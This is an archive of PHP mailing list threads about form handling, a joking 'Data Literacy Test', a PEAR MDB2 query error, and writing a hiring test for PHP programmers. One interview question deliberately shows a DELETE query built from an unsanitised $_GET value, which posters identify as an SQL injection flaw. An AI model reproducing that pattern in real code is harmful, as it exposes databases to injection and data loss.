[PHP] Best way to test for form submission?
This question might give away the fact that I am a php noob, but I am looking for the best way to test for form submission in PHP. I know in Perl this can be done with if (param) but I don't know if that will work with PHP. I have read the Learning PHP 5 book and the only thing that was mentioned in the book was the use of something like this print pHello .$_POST['username']./p; I'm sure that this is not the best/recommended way to do this but I'm hoping someone here will point me in the right direction. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] The Data Literacy Test: Interpretation Added
At 9:29 AM +0800 9/28/08, Shelley wrote: 2008/9/28 tedd mailto:[EMAIL PROTECTED][EMAIL PROTECTED] At 1:06 PM +0800 9/27/08, Shelley wrote: 2008/9/26 tedd mailto:mailto:[EMAIL PROTECTED][EMAIL PROTECTED]mailto:[EMAIL PROTECTED][EMAIL PROTECTED] there are three that you apparently don't know. ??? What is three, excuse me? You say in your link: 20-24 Your are an expert blah blah... So you know 24 of them. I say there are 27 -- so, the three are 25, 26 and 27. Everybody may have his own three, obviously. :) No, what is obvious is that there are three. While the three may vary from layman to layman, they should not vary from programer to programmer. There simply are three terms that your expert programers don't know. I was trying to help, but on second thought forget it. Cheers, tedd -- --- http://sperling.com http://ancientstones.com http://earthstones.com -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] The Data Literacy Test: Interpretation Added
At 1:06 PM +0800 9/27/08, Shelley wrote: 2008/9/26 tedd mailto:[EMAIL PROTECTED][EMAIL PROTECTED] there are three that you apparently don't know. ??? What is three, excuse me? You say in your link: 20-24 Your are an expert blah blah... So you know 24 of them. I say there are 27 -- so, the three are 25, 26 and 27. Why is that difficult for you to understand? tedd -- --- http://sperling.com http://ancientstones.com http://earthstones.com
Re: [PHP] The Data Literacy Test: Interpretation Added
2008/9/28 tedd [EMAIL PROTECTED] At 1:06 PM +0800 9/27/08, Shelley wrote: 2008/9/26 tedd mailto:[EMAIL PROTECTED][EMAIL PROTECTED] there are three that you apparently don't know. ??? What is three, excuse me? You say in your link: 20-24 Your are an expert blah blah... So you know 24 of them. I say there are 27 -- so, the three are 25, 26 and 27. Everybody may have his own three, obviously. :) Why is that difficult for you to understand? tedd -- --- http://sperling.com http://ancientstones.com http://earthstones.com -- With best regards, Shelley Shyan http://phparch.cn
[PHP] The Data Literacy Test: Interpretation Added
Fyi, The interpretation of the score is added. Welcome to check your programming knowledge level: http://www.phparch.cn/index.php/php/34-php-basics/202-the-data-literacy-test :) -- With best regards, Shelley Shyan http://phparch.cn
Re: [PHP] The Data Literacy Test: Interpretation Added
On Fri, 2008-09-26 at 14:02 +0800, Shelley wrote: Fyi, The interpretation of the score is added. Welcome to check your programming knowledge level: http://www.phparch.cn/index.php/php/34-php-basics/202-the-data-literacy-test :) From the interpretation: 20–24 You are an expert programmer. You probably already have the books listed below on your shelf. *lol* Why would probably be applicable in this scenario? More likely most people hit up google to answer their questions. Cheers, Rob. -- http://www.interjinn.com Application and Templating Framework for PHP -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] The Data Literacy Test
2008/9/24 Shelley [EMAIL PROTECTED] http://phparch.cn/index.php/php/34-php-basics/202-the-data-literacy-test The Data Literacy Test: http://www.phparch.cn/index.php/php/34-php-basics/202-the-data-literacy-test -- With best regards, Shelley Shyan http://www.phparch.cn WTF! Don't you think a PHP site would allow the user to input their score and tell them their level on the next page?
Re: [PHP] The Data Literacy Test
Tom Chubb wrote: 2008/9/24 Shelley [EMAIL PROTECTED] http://phparch.cn/index.php/php/34-php-basics/202-the-data-literacy-test The Data Literacy Test: http://www.phparch.cn/index.php/php/34-php-basics/202-the-data-literacy-test -- With best regards, Shelley Shyan http://www.phparch.cn WTF! Don't you think a PHP site would allow the user to input their score and tell them their level on the next page? wondered when somebody would say that; my thoughts exactly - would also make more sense to be multiple choice seeing as many choose to cheat themselves as it were -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] The Data Literacy Test: Interpretation Added
At 2:02 PM +0800 9/26/08, Shelley wrote: Fyi, The interpretation of the score is added. Welcome to check your programming knowledge level: http://www.phparch.cn/index.php/php/34-php-basics/202-the-data-literacy-test :) The answer as I see it is 27. While we both agree that elongated stream, retroactive synapse, and value chain are false computer terms, there are three that you apparently don't know. Would you care point those out so we can discuss them? This reminds me of a survey I conducted in the late 80's where I had section of computer terms for people to indicate what was familiar, or not. The answer of each was either I heard of it, I know it, or Huh? I used that answer to test the truth of the person taking the survey. Interesting enough, I found the ratio of truth was equally spread between all age groups. In other words, the 20-30, 31-40, 41-50, 51-60 age groups all had the same ratio of people reporting a false term as I know it. Cheers, tedd -- --- http://sperling.com http://ancientstones.com http://earthstones.com -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] The Data Literacy Test
On Sep 24, 2008, at 8:22 PM, Shelley wrote: 2008/9/25 Philip Thompson [EMAIL PROTECTED] On Sep 24, 2008, at 7:29 AM, Maciek Sokolewicz wrote: tedd wrote: At 12:25 PM +0100 9/24/08, Ashley Sheridan wrote: On Wed, 2008-09-24 at 09:20 +0800, Shelley wrote: http://phparch.cn/index.php/php/34-php-basics/202-the-data-literacy-test The Data Literacy Test: http://www.phparch.cn/index.php/php/34-php-basics/202-the-data-literacy-test What the smeg is this? I don't know, but I figure 27. Cheers, tedd yes, I think 27 aswell... - Tul No no no. We all know the answer is 42. ? How come 42? Just in case it's not clear what the others have commented about 42... http://wikipedia.org/wiki/Answer_to_Life,_the_Universe,_and_Everything ~Philip -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] The Data Literacy Test
yeah, already saw that. 2008/9/26 Philip Thompson [EMAIL PROTECTED] On Sep 24, 2008, at 8:22 PM, Shelley wrote: 2008/9/25 Philip Thompson [EMAIL PROTECTED] On Sep 24, 2008, at 7:29 AM, Maciek Sokolewicz wrote: tedd wrote: At 12:25 PM +0100 9/24/08, Ashley Sheridan wrote: On Wed, 2008-09-24 at 09:20 +0800, Shelley wrote: http://phparch.cn/index.php/php/34-php-basics/202-the-data-literacy-test The Data Literacy Test: http://www.phparch.cn/index.php/php/34-php-basics/202-the-data-literacy-test What the smeg is this? I don't know, but I figure 27. Cheers, tedd yes, I think 27 aswell... - Tul No no no. We all know the answer is 42. ? How come 42? Just in case it's not clear what the others have commented about 42... http://wikipedia.org/wiki/Answer_to_Life,_the_Universe,_and_Everything ~Philip -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- With best regards, Shelley Shyan http://phparch.cn
Re: [PHP] The Data Literacy Test: Interpretation Added
Actually, I think the author meant that you already read through those books and learned those terms, rather than mean that you are cheating on the test. As the author recommended you read the books listed below if you are not an expert yet. Those recommended books are also added on the interpretation page for your reference. 2008/9/26 Robert Cummings [EMAIL PROTECTED] On Fri, 2008-09-26 at 14:02 +0800, Shelley wrote: Fyi, The interpretation of the score is added. Welcome to check your programming knowledge level: http://www.phparch.cn/index.php/php/34-php-basics/202-the-data-literacy-test :) From the interpretation: 20–24 You are an expert programmer. You probably already have the books listed below on your shelf. *lol* Why would probably be applicable in this scenario? More likely most people hit up google to answer their questions. Cheers, Rob. -- http://www.interjinn.com Application and Templating Framework for PHP -- With best regards, Shelley Shyan http://phparch.cn
Re: [PHP] The Data Literacy Test: Interpretation Added
2008/9/26 tedd [EMAIL PROTECTED] At 2:02 PM +0800 9/26/08, Shelley wrote: Fyi, The interpretation of the score is added. Welcome to check your programming knowledge level: http://www.phparch.cn/index.php/php/34-php-basics/202-the-data-literacy-test :) The answer as I see it is 27. While we both agree that elongated stream, retroactive synapse, and value chain are false computer terms, there are three that you apparently don't know. ??? What is three, excuse me? Would you care point those out so we can discuss them? This reminds me of a survey I conducted in the late 80's where I had section of computer terms for people to indicate what was familiar, or not. The answer of each was either I heard of it, I know it, or Huh? I used that answer to test the truth of the person taking the survey. Interesting enough, I found the ratio of truth was equally spread between all age groups. In other words, the 20-30, 31-40, 41-50, 51-60 age groups all had the same ratio of people reporting a false term as I know it. Cheers, tedd -- --- http://sperling.com http://ancientstones.com http://earthstones.com -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- With best regards, Shelley Shyan http://phparch.cn
Re: [PHP] The Data Literacy Test: Interpretation Added
On Sat, 2008-09-27 at 13:02 +0800, Shelley wrote: Actually, I think the author meant that you already read through those books and learned those terms, rather than mean that you are cheating on the test. As the author recommended you read the books listed below if you are not an expert yet. Those recommended books are also added on the interpretation page for your reference. No, what I was getting at was that I knew almost all the terms and don't think I've read any of the books... possibly the first in university but I can't remember and the book is buried in a box someplace. These days one can learn all the information contained in the books via the web. BTW, I thought value chain was a real concept but you indicate it is garbage. In OOP many would consider the following to be a value chain: $foo-fee-fii-foo-fum I didn't consider myself pompous at all for that interpretation. Cheers, Rob. -- http://www.interjinn.com Application and Templating Framework for PHP -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] The Data Literacy Test
On Wed, 2008-09-24 at 21:45 -0400, Eric Butera wrote: On Wed, Sep 24, 2008 at 9:22 PM, Shelley [EMAIL PROTECTED] wrote: 2008/9/25 Philip Thompson [EMAIL PROTECTED] On Sep 24, 2008, at 7:29 AM, Maciek Sokolewicz wrote: tedd wrote: At 12:25 PM +0100 9/24/08, Ashley Sheridan wrote: On Wed, 2008-09-24 at 09:20 +0800, Shelley wrote: http://phparch.cn/index.php/php/34-php-basics/202-the-data-literacy-test The Data Literacy Test: http://www.phparch.cn/index.php/php/34-php-basics/202-the-data-literacy-test What the smeg is this? I don't know, but I figure 27. Cheers, tedd yes, I think 27 aswell... - Tul No no no. We all know the answer is 42. ? How come 42? -- With best regards, Shelley Shyan http://phparch.cn The question can't exist in the same universe as the answer. :( But 42 is THE answer ;) Ash www.ashleysheridan.co.uk -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] The Data Literacy Test
Ashley Sheridan schreef: On Wed, 2008-09-24 at 21:45 -0400, Eric Butera wrote: On Wed, Sep 24, 2008 at 9:22 PM, Shelley [EMAIL PROTECTED] wrote: 2008/9/25 Philip Thompson [EMAIL PROTECTED] On Sep 24, 2008, at 7:29 AM, Maciek Sokolewicz wrote: tedd wrote: At 12:25 PM +0100 9/24/08, Ashley Sheridan wrote: On Wed, 2008-09-24 at 09:20 +0800, Shelley wrote: http://phparch.cn/index.php/php/34-php-basics/202-the-data-literacy-test The Data Literacy Test: http://www.phparch.cn/index.php/php/34-php-basics/202-the-data-literacy-test What the smeg is this? I don't know, but I figure 27. Cheers, tedd yes, I think 27 aswell... - Tul No no no. We all know the answer is 42. ? How come 42? -- With best regards, Shelley Shyan http://phparch.cn The question can't exist in the same universe as the answer. :( But 42 is THE answer ;) yes indeed, it's the answer to life, the universe and everthing. oh crap, I just gave it away. as penance the next time a strange asks me directions I'm gonna just say 42. Ash www.ashleysheridan.co.uk -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] The Data Literacy Test
At 9:22 AM +0800 9/25/08, Shelley wrote: 2008/9/25 Philip Thompson [EMAIL PROTECTED] On Sep 24, 2008, at 7:29 AM, Maciek Sokolewicz wrote: tedd wrote: At 12:25 PM +0100 9/24/08, Ashley Sheridan wrote: On Wed, 2008-09-24 at 09:20 +0800, Shelley wrote: http://phparch.cn/index.php/php/34-php-basics/202-the-data-literacy-test The Data Literacy Test: http://www.phparch.cn/index.php/php/34-php-basics/202-the-data-literacy-test What the smeg is this? I don't know, but I figure 27. Cheers, tedd yes, I think 27 aswell... - Tul No no no. We all know the answer is 42. ? How come 42? The answer to the question of Life, The Universe, and Everything, is 42. -= Bill =- -- With best regards, Shelley Shyan http://phparch.cn -- A libertarian, immoral society is enticing you to excesses. Enjoy. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] The Data Literacy Test
On Wed, 2008-09-24 at 09:20 +0800, Shelley wrote: http://phparch.cn/index.php/php/34-php-basics/202-the-data-literacy-testThe Data Literacy Test: http://www.phparch.cn/index.php/php/34-php-basics/202-the-data-literacy-test What the smeg is this? Ash www.ashleysheridan.co.uk -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] The Data Literacy Test
At 12:25 PM +0100 9/24/08, Ashley Sheridan wrote: On Wed, 2008-09-24 at 09:20 +0800, Shelley wrote: http://phparch.cn/index.php/php/34-php-basics/202-the-data-literacy-testThe Data Literacy Test: http://www.phparch.cn/index.php/php/34-php-basics/202-the-data-literacy-test What the smeg is this? I don't know, but I figure 27. Cheers, tedd -- --- http://sperling.com http://ancientstones.com http://earthstones.com -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] The Data Literacy Test
tedd wrote: At 12:25 PM +0100 9/24/08, Ashley Sheridan wrote: On Wed, 2008-09-24 at 09:20 +0800, Shelley wrote: http://phparch.cn/index.php/php/34-php-basics/202-the-data-literacy-testThe Data Literacy Test: http://www.phparch.cn/index.php/php/34-php-basics/202-the-data-literacy-test What the smeg is this? I don't know, but I figure 27. Cheers, tedd yes, I think 27 aswell... - Tul -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] The Data Literacy Test
On Sep 24, 2008, at 7:29 AM, Maciek Sokolewicz wrote: tedd wrote: At 12:25 PM +0100 9/24/08, Ashley Sheridan wrote: On Wed, 2008-09-24 at 09:20 +0800, Shelley wrote: http://phparch.cn/index.php/php/34-php-basics/202-the-data-literacy-test The Data Literacy Test: http://www.phparch.cn/index.php/php/34-php-basics/202-the-data-literacy-test What the smeg is this? I don't know, but I figure 27. Cheers, tedd yes, I think 27 aswell... - Tul No no no. We all know the answer is 42. ~Phil -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] The Data Literacy Test
2008/9/25 Philip Thompson [EMAIL PROTECTED] On Sep 24, 2008, at 7:29 AM, Maciek Sokolewicz wrote: tedd wrote: At 12:25 PM +0100 9/24/08, Ashley Sheridan wrote: On Wed, 2008-09-24 at 09:20 +0800, Shelley wrote: http://phparch.cn/index.php/php/34-php-basics/202-the-data-literacy-test The Data Literacy Test: http://www.phparch.cn/index.php/php/34-php-basics/202-the-data-literacy-test What the smeg is this? I don't know, but I figure 27. Cheers, tedd yes, I think 27 aswell... - Tul No no no. We all know the answer is 42. ? How come 42? -- With best regards, Shelley Shyan http://phparch.cn
Re: [PHP] The Data Literacy Test
On Wed, Sep 24, 2008 at 9:22 PM, Shelley [EMAIL PROTECTED] wrote: 2008/9/25 Philip Thompson [EMAIL PROTECTED] On Sep 24, 2008, at 7:29 AM, Maciek Sokolewicz wrote: tedd wrote: At 12:25 PM +0100 9/24/08, Ashley Sheridan wrote: On Wed, 2008-09-24 at 09:20 +0800, Shelley wrote: http://phparch.cn/index.php/php/34-php-basics/202-the-data-literacy-test The Data Literacy Test: http://www.phparch.cn/index.php/php/34-php-basics/202-the-data-literacy-test What the smeg is this? I don't know, but I figure 27. Cheers, tedd yes, I think 27 aswell... - Tul No no no. We all know the answer is 42. ? How come 42? -- With best regards, Shelley Shyan http://phparch.cn The question can't exist in the same universe as the answer. :( -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] The Data Literacy Test
http://phparch.cn/index.php/php/34-php-basics/202-the-data-literacy-testThe Data Literacy Test: http://www.phparch.cn/index.php/php/34-php-basics/202-the-data-literacy-test -- With best regards, Shelley Shyan http://www.phparch.cn
[PHP] Re: MDB2 simple test
Mark,
this is my main_includes.php file :
?php
$path = 'pear';
set_include_path(get_include_path() . PATH_SEPARATOR . $path);
require_once Structures/DataGrid.php;
require_once 'MDB2.php';
?
and in my file where i try to use MDB2.php, it's included like that :
?php
include_once('includes/main_include.php');
?
at the beginning of my file before all META
Articles table exists in my database, i've checked also if i did not make
some mistakes in the user name, password or dbnane in my dsn,
but as i do not have any error raised from the database connection. I guess
that everything is correct.
Al.
On 11/11/06, Mark Wiesemann [EMAIL PROTECTED] wrote:
Alain Roger wrote:
I have a main_includes.php which include_once/require_once all needed
things like
MDB2.php or setpath for /pear folder
Okay, but remember that the PEAR dir needs to in the include_path.
Otherwise, e.g. MDB2 won't find its own files and might not work as
expected.
Anyway, you are right.
issue is on the Query command.
Here is the error message :
MDB2 Error: unknown error
_doQuery: [Error message: Could not execute statement] [Last executed
query: SELECT * FROM articles]
but it does not help me so much this error.
Is this the output of getMessage() and getDebugInfo(). If it isn't,
getDebugInfo() should give you more information.
Anyway: Does the articles table exist in your database?
Regards,
Mark
[PHP] Fwd: MDB2 simple test
-- Forwarded message --
From: Alain Roger [EMAIL PROTECTED]
Date: Nov 11, 2006 12:26 PM
Subject: Re: MDB2 simple test
To: Mark Wiesemann [EMAIL PROTECTED]
I have a main_includes.php which include_once/require_once all needed things
like
MDB2.php or setpath for /pear folder
Anyway, you are right.
issue is on the Query command.
Here is the error message :
MDB2 Error: unknown error
_doQuery: [Error message: Could not execute statement] [Last executed query:
SELECT * FROM articles]
but it does not help me so much this error.
Ok, it can not execute the query but why ?
example if from the PEAR help file :-(
Al.
On 11/11/06, Mark Wiesemann [EMAIL PROTECTED] wrote:
[FYI: This is a copy of a message posted to news:php.pear.general
Message-ID: [EMAIL PROTECTED]]
Alain Roger wrote:
As i'm new to PEAR world, i try to understand how does it work.
for that i took the MDB2 and try to use it with PostgreSQL.
here is a basic sample extract from PEAR help file and only modified.
require_once 'Pear/MDB2.php';
This line should be better:
require_once 'MDB2.php';
(and the PEAR directory should be in your include_path)
$dsn = 'pgsql://login:[EMAIL PROTECTED]';
$mdb2 = MDB2::connect($dsn);
if (PEAR::isError($mdb2))
{
die($mdb2-getMessage());
}
$res = $mdb2-query('SELECT * FROM articles');
You need to an error check here:
if (PEAR::isError($res)) {
die($res-getMessage() . 'br /' . $res-getDebugInfo());
}
It's very likely that the following error about fetchRow() is caused
because the query failed: fetchRow() would then be called on an
MDB2_Error (or PEAR_Error) object which, of course, does not have a
fetchRow() method.
while ($row = $res-fetchRow(MDB2_FETCHMODE_ASSOC))
{
echo $row['title'] . ', ' . $row['content'] . \n;
}
$res-free();
when i try this code, the following error is raised :
Call to undefined method MDB2_Error::fetchRow() which points to ==
while
($row = $res-fetchRow(MDB2_FETCHMODE_ASSOC))
Regards,
Mark
[PHP] Re: MDB2 simple test
for more information, here is the variable where points the include_path :
include path = F:\My documents\Development\Website\Immense\Pear
as i did not install PEAR via script, i uncompress it and copy files into
Pear folder.
i did this because my web hoster will not accept to install PEAR on his
server.
in folder : F:\My documents\Development\Website\Immense\Pear, i have all
standard PEAR folder installation files... e.g. PEAR.PHP, MDB2.PHP, and
relative subfolders.
Al.
On 11/11/06, Alain Roger [EMAIL PROTECTED] wrote:
Mark,
this is my main_includes.php file :
?php
$path = 'pear';
set_include_path(get_include_path() . PATH_SEPARATOR . $path);
require_once Structures/DataGrid.php;
require_once 'MDB2.php';
?
and in my file where i try to use MDB2.php, it's included like that :
?php
include_once('includes/main_include.php');
?
at the beginning of my file before all META
Articles table exists in my database, i've checked also if i did not make
some mistakes in the user name, password or dbnane in my dsn,
but as i do not have any error raised from the database connection. I
guess that everything is correct.
Al.
On 11/11/06, Mark Wiesemann [EMAIL PROTECTED] wrote:
Alain Roger wrote:
I have a main_includes.php which include_once/require_once all needed
things like
MDB2.php or setpath for /pear folder
Okay, but remember that the PEAR dir needs to in the include_path.
Otherwise, e.g. MDB2 won't find its own files and might not work as
expected.
Anyway, you are right.
issue is on the Query command.
Here is the error message :
MDB2 Error: unknown error
_doQuery: [Error message: Could not execute statement] [Last executed
query: SELECT * FROM articles]
but it does not help me so much this error.
Is this the output of getMessage() and getDebugInfo(). If it isn't,
getDebugInfo() should give you more information.
Anyway: Does the articles table exist in your database?
Regards,
Mark
RE: [PHP] Basic PHP knowledge test
My advice, give the candidates problems and see how they solve them. Even if they don't finish, you get an idea of how they think. tedd I like this idea! Do you expect them to be able to work with code written by others? If so, hand them some of your existing code (good examples and not so good) and ask them to figure out what it does and recommend changes. I really really like the 'give them a problem and have them solve it' idea... Doug ___ This e-mail message has been sent by Kollsman, Inc. and is for the use of the intended recipients only. The message may contain privileged or confidential information. If you are not the intended recipient you are hereby notified that any use, distribution or copying of this communication is strictly prohibited, and you are requested to delete the e-mail and any attachments and notify the sender immediately. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Basic PHP knowledge test
To refine that a bit, you may want to give them some code that has been intentionally broken (simple things for the entry level position, such as missing semicolons or curly braces etc) and watch to see how they go about discovering the parse errors. To me, it would be better to hire someone that can solve problems quickly, not someone who can simply tell you what a piece of code is doing. Just a thought though - good luck! -Joe On Jul 20, 2006, at 7:20 AM, Finner, Doug wrote: My advice, give the candidates problems and see how they solve them. Even if they don't finish, you get an idea of how they think. tedd I like this idea! Do you expect them to be able to work with code written by others? If so, hand them some of your existing code (good examples and not so good) and ask them to figure out what it does and recommend changes. I really really like the 'give them a problem and have them solve it' idea... Doug __ _ This e-mail message has been sent by Kollsman, Inc. and is for the use of the intended recipients only. The message may contain privileged or confidential information. If you are not the intended recipient you are hereby notified that any use, distribution or copying of this communication is strictly prohibited, and you are requested to delete the e-mail and any attachments and notify the sender immediately. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Basic PHP knowledge test
Please reply to the list. jekillen wrote: On Jul 19, 2006, at 8:31 AM, John Nichel wrote: We're looking to hire an entry level php programmer here, and I've been tasked with writing the test to evaluate the potential candidates. Being the lazy guy that I am, I naturally turned to Google to see if I could find some tests that I could use. After clicking thru many links, and finding mostly 'basic php tutorials', I've come here to ask you people to do my homework for me. ;) Does anyone have any links/resources for a basic php knowledge test? If not, I'll have to write one from scratch myself, and mess up the rest of my day of goofing off/sleeping. What does $_POST['x'] mean? What does $ in front of a string of chars without quotes mean? That does register globals mean? Is it possible to run php as a cgi script? When it is necessary to use 'var' in php code? If you can't answer these questions how are you going to know if someone is giving you the right answers? There are tons of basic to advance books on the commercial market about php. I've gone the distance and shelled out literally 1,000 of dollars buying books and hours learning the stuff. If you want answers to your questions spend a little time so you will know if someone has passed a test or not. I've spent the past 8+ years 'going the distance' in PHP (quite a bit longer when you count in things like Perl, PASCAL, COBOL, etc), and shelled out about $25 on one PHP book. The web is a far better, cheaper, and more up-to-date learning source. However, I'm a geek, not some college kid who writes up documents so that HR can have a pretty piece of paper saying this guy knows the difference between '==' and '==='. -- John C. Nichel IV Programmer/System Admin (ÜberGeek) Dot Com Holdings of Buffalo 716.856.9675 [EMAIL PROTECTED] -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Basic PHP knowledge test
Finner, Doug wrote: My advice, give the candidates problems and see how they solve them. Even if they don't finish, you get an idea of how they think. tedd I like this idea! Do you expect them to be able to work with code written by others? If so, hand them some of your existing code (good examples and not so good) and ask them to figure out what it does and recommend changes. Most definitely. This position isn't going to really require the person to write their own apps. Most of the stuff he/she will be doing is maintaining code already in place. Plenty of it will be my code, but prior to me starting here three years ago, they used to just get people on a contract basis, and there's some pretty messed up code. They even contracted a job out to a couple of Russian programmers; code's pretty clean, but all the comments are in Russian. ;) I like the idea of giving them a piece of our existing code and getting them to do something with it...I'll just have to get HR to accept my word on how they did on it (they really want a question and answer sheet that they can 'grade'). I really really like the 'give them a problem and have them solve it' idea... Yeah, one of my earliest thoughts on this was to have them write something simple like connecting to a db, selecting multiple rows, parsing our the result, and displaying it in some fashion. -- John C. Nichel IV Programmer/System Admin (ÜberGeek) Dot Com Holdings of Buffalo 716.856.9675 [EMAIL PROTECTED] -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Basic PHP knowledge test
John Nichel wrote: What does $_POST['x'] mean? What does $ in front of a string of chars without quotes mean? That does register globals mean? Is it possible to run php as a cgi script? When it is necessary to use 'var' in php code? I would probably agree that a problem would be better. Here's an idea, have one of your HR people take some existing code and do something to it to give it a bug, then have the guy fix it, and see how close he comes to what's there. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Basic PHP knowledge test
On Thursday 20 July 2006 07:23, John Nichel wrote: Yeah, one of my earliest thoughts on this was to have them write something simple like connecting to a db, selecting multiple rows, parsing our the result, and displaying it in some fashion. Don't forget making it secure. Here is one of my questions people can use if they like. Feel free to re-word it. I'm a programmer, not a writer ;) What change(s) would you make to the following code to make it more secure? $id = $_GET['id']; mysql_query(“DELETE FROM myTbl WHERE id = $id”); I like this question, because they have to know at least the fundamentals of PHP security. -- Ray Hauge Programmer/Systems Administrator American Student Loan Services www.americanstudentloan.com 1.800.575.1099 -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Basic PHP knowledge test
Ray Hauge wrote: On Thursday 20 July 2006 07:23, John Nichel wrote: Yeah, one of my earliest thoughts on this was to have them write something simple like connecting to a db, selecting multiple rows, parsing our the result, and displaying it in some fashion. Don't forget making it secure. Here is one of my questions people can use if they like. Feel free to re-word it. I'm a programmer, not a writer ;) What change(s) would you make to the following code to make it more secure? $id = $_GET['id']; mysql_query(“DELETE FROM myTbl WHERE id = $id”); /* // removed security flaw $id = $_GET['id']; mysql_query(“DELETE FROM myTbl WHERE id = $id”); //*/ ;-) I like this question, because they have to know at least the fundamentals of PHP security. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Basic PHP knowledge test
Ray Hauge wrote: Don't forget making it secure. Here is one of my questions people can use if they like. Feel free to re-word it. I'm a programmer, not a writer ;) What change(s) would you make to the following code to make it more secure? $id = $_GET['id']; mysql_query(“DELETE FROM myTbl WHERE id = $id”); Believe it or not, I've lost count of how many times I've seen things like this in Real Life. SQL Injection waiting to happen... I like this question, because they have to know at least the fundamentals of PHP security. Agreed. One thing I would add is to make sure they're familiar with the PHP version you use. Regards, Austin. signature.asc Description: OpenPGP digital signature
Re: [PHP] Basic PHP knowledge test
On Thu, 2006-07-20 at 09:19, Jochem Maas wrote: Ray Hauge wrote: On Thursday 20 July 2006 07:23, John Nichel wrote: Yeah, one of my earliest thoughts on this was to have them write something simple like connecting to a db, selecting multiple rows, parsing our the result, and displaying it in some fashion. Don't forget making it secure. Here is one of my questions people can use if they like. Feel free to re-word it. I'm a programmer, not a writer ;) What change(s) would you make to the following code to make it more secure? $id = $_GET['id']; mysql_query(“DELETE FROM myTbl WHERE id = $id”); /* // removed security flaw $id = $_GET['id']; mysql_query(“DELETE FROM myTbl WHERE id = $id”); //*/ ;-) You removed a lot more than the security flaw. No job for U! Cheers, Rob. -- .. | InterJinn Application Framework - http://www.interjinn.com | :: | An application and templating framework for PHP. Boasting | | a powerful, scalable system for accessing system services | | such as forms, properties, sessions, and caches. InterJinn | | also provides an extremely flexible architecture for | | creating re-usable components quickly and easily. | `' -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Basic PHP knowledge test
Here's one companies quiz that they gave: With each question, please keep the code short and simple. Make notes on possible caveats and fixes rather than adding a lot of error-checking to your code. 1. Write a PHP script to remove duplicate lines from a file. Do not worry about efficiency. Ex. input: Tree Donut Fish Food Tree Tree Doctor Fish Food Ex. output: Tree Donut Fish Food Doctor 2. Write a PHP script that retrieves the Word of the Day from http://dictionary.com/. 3. Write a PHP web page script which redirects visitors to google.com if their IP address is not of the form 10.x.x.x nor 192.168.x.x. Users who do not get redirected should be shown a top secret message. 4. Write a PHP script which inserts the contents of a TAB-delimited text file into a MySQL table. You must create the table. The columns are named in the file. Here is the data format with some example data: idTABnameTABageTABemailTABactive 1TABBerthaTAB93TAB[EMAIL PROTECTED]TAB1 2TABSammyTAB40TAB[EMAIL PROTECTED]TAB1 3TABErinTAB15TAB[EMAIL PROTECTED]TAB0 4TABRupertTAB29TAB[EMAIL PROTECTED]TAB1 5. Write a PHP function to determine if two strings are close enough, such as to find misspelt words. o Extra letters are OK. close_enough( 'apartment', 'appartmeant' ); returns true o Missing letters are OK. close_enough( 'apartment', 'aprmnt' ); returns true o Substitutions are OK. close_enough( 'apartment', 'apardmint' ); returns true o Only allow up to 1 error per 3 letters in the correct word, rounding up. For example, a 10-letter word can have up to 4 errors. They can be anywhere in the word. -Original Message- From: John Nichel [mailto:[EMAIL PROTECTED] Sent: Thursday, July 20, 2006 5:31 AM To: PHP Mailing Lists Subject: Re: [PHP] Basic PHP knowledge test Finner, Doug wrote: My advice, give the candidates problems and see how they solve them. Even if they don't finish, you get an idea of how they think. tedd I like this idea! Do you expect them to be able to work with code written by others? If so, hand them some of your existing code (good examples and not so good) and ask them to figure out what it does and recommend changes. Most definitely. This position isn't going to really require the person to write their own apps. Most of the stuff he/she will be doing is maintaining code already in place. Plenty of it will be my code, but prior to me starting here three years ago, they used to just get people on a contract basis, and there's some pretty messed up code. They even contracted a job out to a couple of Russian programmers; code's pretty clean, but all the comments are in Russian. ;) I like the idea of giving them a piece of our existing code and getting them to do something with it...I'll just have to get HR to accept my word on how they did on it (they really want a question and answer sheet that they can 'grade'). I really really like the 'give them a problem and have them solve it' idea... Yeah, one of my earliest thoughts on this was to have them write something simple like connecting to a db, selecting multiple rows, parsing our the result, and displaying it in 